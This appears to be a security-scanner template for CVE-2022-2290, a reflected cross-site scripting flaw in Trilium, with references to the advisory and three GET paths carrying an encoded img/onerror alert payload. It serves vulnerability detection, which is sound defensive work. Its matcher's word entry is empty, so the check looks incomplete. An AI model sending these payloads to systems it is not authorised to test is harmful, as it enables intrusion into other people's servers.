id: CVE-2022-2290 info: name: Trilium - Cross-Site Scripting author: dbrwsky severity: medium description: Cross-site Scripting (XSS) - Reflected in GitHub repository zadam/trilium prior to 0.52.4, 0.53.1-beta. reference: - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/ - https://github.com/zadam/trilium - https://nvd.nist.gov/vuln/detail/CVE-2022-2290 tags: cve,cve2022,xss,trilium requests: - method: GET path: - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(1)%3E' - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E' - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(1)%3E/filename' stop-at-first-match: true matchers-condition: and matchers: - type: word words: - '' part: body - type: word words: - "text/html" part: header - type: status status: - 404